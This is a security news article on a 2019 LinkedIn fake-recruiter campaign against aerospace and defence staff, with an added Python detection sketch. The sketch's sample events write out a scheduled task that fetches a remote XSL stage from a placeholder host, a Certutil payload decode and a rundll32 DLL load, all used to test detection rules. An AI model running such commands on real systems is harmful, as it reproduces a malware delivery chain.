LinkedIn ‘Job Offers’ Targeted Aerospace & Military Personnel

A recent malware campaign targeted employees of European and Middle Eastern aerospace and military companies, using LinkedIn spear-phishing messages from fake recruiters to steal information and money from military and aerospace executives.

Attackers are impersonating human resource employees from Collins Aerospace and General Dynamics in a spear-phishing campaign leveraging LinkedIn’s messaging service. Targets are sent phony job offers that include malicious documents designed to fetch data-exfiltrating malware.

To trick prospective victims, the attackers created fraudulent LinkedIn accounts impersonating human resources or hiring managers from various aerospace and defense companies, including Collins Aerospace and General Dynamics, ESET explains. They then used LinkedIn’s messaging feature to reach out to targeted employees and offer an employment opportunity, in the hope of getting them to open a malicious file sent either directly through LinkedIn or via a combination of email and OneDrive.

Researchers believe the primary goal of the attacks, which took place from September to December 2019, was espionage; some also suggested the attackers may have had financial motives.

Victims were first sent a job offer in a LinkedIn message from a “well-known company in a relevant sector.” These included Collins Aerospace, a major US supplier of aerospace and defense products, and General Dynamics, another large US-based corporation. 

The “job offer” file was a password-protected RAR archive containing a LNK file. When the LNK file was opened, it displayed a seemingly innocuous PDF document showing salary information for the fake job. However, the PDF was a decoy:

Behind the scenes, a Command Prompt utility (a command-line interface program used to execute commands in Windows) was executed to create a scheduled task. 

The attackers made use of a Windows component called Task Scheduler, which allows programs to be launched at pre-defined times. The scheduled task was set to execute a remote XSL script. XSL (Extensible Stylesheet Language) files are commonly used for processing data within XML files. The XSL script downloaded base64-encoded payloads, which were then decoded by a legitimate Windows utility called Certutil. Certutil is normally used to dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates. Another Windows command-line utility, rundll32 (used for loading DLLs), was then used to download and run a PowerShell DLL.

The abuse of these two legitimate, preinstalled Windows utilities is a common technique known as ‘living off the land’: malicious activity is carried out with built-in tools so that it blends in with regular system activity.
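As an added illustration (not from the article or from ESET’s report), the following Python sketch shows how a defender might flag the living-off-the-land chain described above in process-creation telemetry: a scheduled task referencing a remote XSL script, a Certutil base64 decode, and rundll32 loading a DLL from a user-writable path. The event fields, rule names, file paths and URL are constructed assumptions, not indicators from the campaign.

```python
import re
from dataclasses import dataclass
@dataclass
class ProcessEvent:
    """Process-creation record, fields modelled on Sysmon Event ID 1 / Security 4688."""
    host: str
    image: str
    cmdline: str

# Rules for the chain in the article: scheduled task -> remote XSL script ->
# certutil base64 decode -> rundll32 loading a DLL from a user-writable path.
RULES = [
    ("schtask_remote_xsl", "schtasks.exe", re.compile(r"/create\b.*https?://\S+\.xsl", re.I)),
    ("certutil_decode", "certutil.exe", re.compile(r"(^|\s)-decode\b", re.I)),
    ("rundll32_user_path", "rundll32.exe",
     re.compile(r"\\(appdata|temp|users\\public)\\[^\s,]+\.dll", re.I)),
]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def match_event(ev):
    """Names of all rules the event satisfies (image basename AND command-line pattern)."""
    return [name for name, image, rx in RULES
            if basename(ev.image) == image and rx.search(ev.cmdline)]

def triage(events):
    """Map host -> sorted distinct rule names hit on that host."""
    per_host = {}
    for ev in events:
        for name in match_event(ev):
            per_host.setdefault(ev.host, set()).add(name)
    return {h: sorted(r) for h, r in per_host.items()}

def escalate(events, min_rules=2):
    """Hosts where several stages of the chain co-occur; single hits are noisy on their own."""
    return sorted(h for h, r in triage(events).items() if len(r) >= min_rules)

# Constructed sample events (not real telemetry); paths and URL are placeholders.
SAMPLE = [
    ProcessEvent("ws-01", r"C:\Windows\System32\schtasks.exe",
                 r'schtasks.exe /create /sc minute /mo 5 /tn Updater /tr "C:\Users\Public\run.cmd http://example.invalid/stage.xsl"'),
    ProcessEvent("ws-01", r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -decode C:\Users\Public\p.b64 C:\Users\Public\p.dll"),
    ProcessEvent("ws-01", r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Users\Public\p.dll,Start"),
    ProcessEvent("ws-02", r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -verify C:\certs\server.cer"),  # benign admin use, no hit
    ProcessEvent("ws-02", r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),  # benign
]
```

Requiring two or more distinct stages on one host before escalating keeps routine administrative use of Certutil or rundll32 from paging an analyst, while the full chain still surfaces.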

Since logging of executed PowerShell commands is disabled by default, the researchers could not retrieve the commands the malware ran. However, they found that the attackers queried the Active Directory (AD) server to obtain a list of employees, including administrator accounts, and subsequently carried out password brute-force attacks against those administrator accounts.

In one case, the attackers found communication between the victim and a customer regarding an unresolved invoice. The attackers joined the conversation, purporting to be the victim, and urged the customer to pay the invoice into an attacker-controlled bank account. Paul Rockwell, head of trust and safety at LinkedIn, said that the creation of a fake account or fraudulent activity with an intent to mislead or lie to LinkedIn members “is a violation of our terms of service.”

Researchers advise watching for the staples of spear-phishing, such as suspicious attachments and spelling errors, which can turn up in LinkedIn messages just as they do in email.

In the case of one scam, the adversaries impersonated one of their targets, sending an email with a fake invoice to one of the victim’s customers, hoping to persuade the recipient to route a bank payment to the attackers’ account. The fraud was exposed when the customer emailed back the legitimate target company instead of the attackers.

Sources: LinkedIn, Threatpost, SC Magazine, Infosecurity
